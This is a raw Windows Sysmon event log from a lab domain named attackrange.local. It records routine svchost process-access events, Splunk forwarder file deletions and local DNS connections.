10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.472{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.316{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38454C162860008362E30F345A2580C4,SHA256=622C66718855B2965484915E7E108E628FAC8D8BE4E7642994BE1E546B616989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:06.847{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCE06A3D2C2832D58F7A17271D97A36,SHA256=EADB09F0BC26E3AA6F30E0D6DD479F2DAB642C1CB40CC67CEA99A74467F89C0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.185{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56927- 354300x8000000000000000287483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.183{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57671- 354300x8000000000000000287482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.181{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58744- 354300x8000000000000000287481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.179{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local59599- 354300x8000000000000000287480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.178{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53357- 354300x8000000000000000287479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.176{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61774- 354300x8000000000000000287478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.174{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local50751- 354300x8000000000000000287477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.173{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local62066- 354300x8000000000000000287476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.172{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local54889- 354300x8000000000000000287475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:05.171{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT 